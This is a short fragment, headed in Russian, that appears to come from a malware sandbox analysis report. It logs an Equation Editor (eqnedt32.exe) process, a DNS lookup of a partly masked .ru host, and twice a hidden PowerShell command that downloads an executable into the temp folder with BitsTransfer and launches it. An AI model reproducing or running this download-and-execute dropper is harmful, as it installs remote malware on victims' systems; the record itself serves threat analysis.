Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$PPoBYD=$env:temp+'\xBV.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://s2####3.smrtp.ru/e/vic.exe' -Destination $PPoBYD;(New-Object -com Shell.Application...
- 's2####3.smrtp.ru':80
- DNS ASK s2####3.smrtp.ru
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$PPoBYD=$env:temp+'\xBV.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://s2####3.smrtp.ru/e/vic.exe' -Destination $PPoBYD;(New-Object -com Shell.Application...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding